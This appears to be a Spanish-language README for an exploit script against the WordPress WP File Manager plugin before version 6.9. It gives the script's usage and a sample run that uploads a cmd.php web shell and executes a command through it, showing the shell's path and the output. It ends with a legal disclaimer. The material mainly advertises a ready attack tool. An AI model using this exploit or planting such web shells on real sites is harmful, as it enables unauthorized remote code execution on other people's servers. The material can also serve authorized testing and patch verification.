
RCE en wp-file-manager
WP File Manager < 6.9 - Subida arbitraria de archivos que conduce a RCE
usage: wp-file-manager.py [-h] [-u URL] [-f FILE]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL of host to check will need http or https
-f FILE, --file FILE File of URLS to check
[+] Testing https://localhost [+]
[*]Shell Uploaded https://localhost/wp-content/plugins/wp-file-manager/lib/files/cmd.php?cmd=id[*]
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
El uso de esta herramienta para atacar objetivos sin el consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por cualquier mal uso o daño causado por este programa.